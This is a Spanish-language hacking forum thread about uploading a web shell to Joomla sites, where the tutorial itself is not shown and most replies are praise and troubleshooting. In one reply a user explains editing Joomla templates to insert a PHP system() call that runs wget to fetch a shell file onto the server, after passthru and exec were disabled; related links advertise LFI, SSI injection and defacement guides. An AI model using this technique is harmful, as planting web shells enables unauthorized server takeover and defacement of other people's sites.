comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Upload shell en Joomla

  • 10 Respuestas
  • 4351 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado duff10

  • *
  • Underc0der
  • Mensajes: 12
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« en: Mayo 19, 2012, 04:33:45 pm »
Buenas chicos soy: Duff eh estado en otros foros de informatica como en Diosdelared... les quiero compartir un tutorial que hice, espero les guste.. comenten



« Última modificación: Julio 27, 2015, 04:52:03 am por blackdrake »

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5401
  • Actividad:
    30%
  • Reputación 31
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #1 en: Mayo 19, 2012, 04:47:51 pm »
Que buen aporte Duff!!
Segui asi man!


Desconectado Abnormality

  • *
  • Underc0der
  • Mensajes: 392
  • Actividad:
    0%
  • Reputación 0
  • %SystemRoot%
    • Ver Perfil
    • Email
« Respuesta #2 en: Mayo 19, 2012, 07:21:18 pm »
Buen aporte, me gusto mucho. Saludos!

Desconectado M1ndCr4ck

  • *
  • Underc0der
  • Mensajes: 10
  • Actividad:
    0%
  • Reputación 0
  • Lo único que no podrán quitarnos es la mente
    • Ver Perfil
    • ~M1ndCr4ck~
« Respuesta #3 en: Junio 01, 2012, 12:37:36 am »
que gran aporte de mucha ayuda.
salu2 duff  ;D

Desconectado عя ҜΔŁĬ

  • *
  • Underc0der
  • Mensajes: 21
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #4 en: Junio 27, 2012, 12:03:21 pm »
Gracais por el tutorial, ya probe de dos formas, editando las plantilas y poniendo un uploader, y tambien con este método, pero al momento de subir el archivo me tira este error:

Citar
Not Acceptable

An appropriate representation of the requested resource /administrator/index.php could not be found on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

Qué podría hacer para solucionarlo? Saludos

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5401
  • Actividad:
    30%
  • Reputación 31
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #5 en: Junio 27, 2012, 12:05:41 pm »
Quizas la version que tenes instalada ya esta parcheada


Desconectado Cronos

  • *
  • Underc0der
  • Mensajes: 1000
  • Actividad:
    0%
  • Reputación 1
  • Mientras mas se, me doy cuenta de lo poco que se.
    • Ver Perfil
    • Email
  • Skype: cronos.labs
« Respuesta #6 en: Junio 27, 2012, 12:09:48 pm »
Si, yo instale Joomla y quise tratar de subir una shell por el Panel de Administracion como si fuera una imagen. Igual como dice el tutorial este, pero al tratar de modificar la seccion para agregar extenciones. Esta por lo que vi ya ha sido parcheada. Porlomenos en la version que probe que era la 2.5
Saludos,, Cronos.-

Desconectado عя ҜΔŁĬ

  • *
  • Underc0der
  • Mensajes: 21
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #7 en: Junio 27, 2012, 12:26:30 pm »
Gracias por las respuestas, la versión que usa es la 1.5.22. Acabo de intentar meterle passthru en las plantillas, pero al poner index.php=cmd=uname -a no me tira nada, seguire probando haciendo inlude o algun consejo que me digáis...
Saludos

EDIT: ya subí la shell, para los que quieran saber cómo, van a editar plantillas, y meten el comando system: <?php system("wget http:\\shell.txt") ?>
El comando  passthru y exec estaba dessactivado en ese servidor, por eso tuve que usar system()
Saludos ;)
« Última modificación: Junio 28, 2012, 07:28:24 am por عя ҜΔŁĬ »

Desconectado Sanko

  • *
  • Underc0der
  • Mensajes: 541
  • Actividad:
    0%
  • Reputación 0
  • ¿Puedes?
    • Ver Perfil
    • Underc0de
« Respuesta #8 en: Junio 27, 2012, 03:23:03 pm »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
Si, yo instale Joomla y quise tratar de subir una shell por el Panel de Administracion como si fuera una imagen. Igual como dice el tutorial este, pero al tratar de modificar la seccion para agregar extenciones. Esta por lo que vi ya ha sido parcheada. Porlomenos en la version que probe que era la 2.5
Saludos,, Cronos.-
La 2.5 tiene vulnerabilidad en el registro :No tienes permisos para ver links. Registrate o Entra con tu cuenta
Sigueme en Twitter : @Sankosk
Estos nuevos staff no tienen puta idea XD

Desconectado Dedalo

  • *
  • Underc0der
  • Mensajes: 117
  • Actividad:
    0%
  • Reputación 0
  • KUSH
    • Ver Perfil
    • Twitter Personal
  • Twitter: https://twitter.com/SeguridadBlanca
« Respuesta #9 en: Junio 27, 2012, 08:18:46 pm »
Excelente post :) muy útil.


No tienes permisos para ver links. Registrate o Entra con tu cuenta


Saludos,
Dedalo
No tienes permisos para ver links. Registrate o Entra con tu cuenta

Desconectado hdbreaker

  • *
  • Underc0der
  • Mensajes: 411
  • Actividad:
    0%
  • Reputación 0
  • HD_Breaker
    • Ver Perfil
    • Security Signal
    • Email
  • Skype: hdbreaker96
  • Twitter: @SecSignal
« Respuesta #10 en: Junio 28, 2012, 12:07:19 am »
Buen Aporte, Nunca lo habia probado!

Ser Libres es un Privilegio por el cual pocos estamos dispuestos a correr el riesgo

 

¿Te gustó el post? COMPARTILO!



Explotar LFI, Subir Shell Explotando /proc/self/environ y Backdoorizar

Iniciado por hdbreaker

Respuestas: 1
Vistas: 2440
Último mensaje Julio 17, 2012, 12:35:31 am
por hdbreaker
Subir Shell a través de Inyección SSI (Server-side include)

Iniciado por CalebBucker

Respuestas: 7
Vistas: 3790
Último mensaje Junio 23, 2012, 08:44:07 am
por s3cur1tyr00t
Shell-Save_1.0 [Administra de manera mas eficiente tus webshells online]

Iniciado por q3rv0

Respuestas: 9
Vistas: 4101
Último mensaje Abril 14, 2013, 05:34:46 am
por s3cur1tyr00t
Intrusión a un Servidor Por SQLi y Obtener shell

Iniciado por hdbreaker

Respuestas: 11
Vistas: 4654
Último mensaje Julio 15, 2012, 09:12:22 am
por عя ҜΔŁĬ
Deface un site utilizando shell c99 por keymort

Iniciado por ..::key-m0rt::..

Respuestas: 4
Vistas: 3872
Último mensaje Marzo 30, 2011, 08:56:50 pm
por Devilboy